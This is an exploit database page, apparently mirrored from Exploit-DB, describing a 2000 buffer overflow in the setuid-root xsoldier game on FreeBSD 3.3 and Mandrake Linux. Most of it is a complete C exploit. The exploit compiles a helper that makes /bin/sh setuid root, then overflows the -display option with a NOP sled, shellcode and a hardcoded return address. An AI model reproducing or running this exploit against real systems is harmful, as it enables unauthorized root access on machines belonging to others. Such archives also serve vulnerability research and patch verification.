Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)

🗓️ 17 May 2000 00:00:00Reported by Brock TellierType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 32 Views

Vulnerable xsoldier binary allows buffer overflow for root access on FreeBSD and Mandrake Linux.

Code
// source: https://www.securityfocus.com/bid/871/info

Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.

The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.

The user does not have to have a valid $DISPLAY to exploit this.

/* 
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier [email protected]
*/


#include <stdio.h>

char shell[]= /* [email protected] */
 "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

void buildui() {
FILE *fp;
 char cc[100];
 fp = fopen("/tmp/ui.c", "w");
 fprintf(fp, CODE);
 fclose(fp);
 snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
 system(cc);
}

main (int argc, char *argv[] ) {
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4400;
char buf[bsize];
int eip = 0xbfbfdb65; /* works for me */
buildui();

if (argv[1]) { 
  offset = atoi(argv[1]);
  eip = eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<[email protected]>\n");
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

for ( x = 0; x < 4325; x++) buf[x] = 0x90;
   fprintf(stderr, "NOPs to %d\n", x);

for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
   fprintf(stderr, "Shellcode to %d\n",x);
 
 buf[x++] = eip & 0x000000ff;
 buf[x++] = (eip & 0x0000ff00) >> 8;
 buf[x++] = (eip & 0x00ff0000) >> 16;
 buf[x++] = (eip & 0xff000000) >> 24;
   fprintf(stderr, "eip to %d\n",x);

buf[bsize]='\0';

execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
xsoldier binarybuffer overflowroot accessfreebsdmandrake linuxsetuid root
32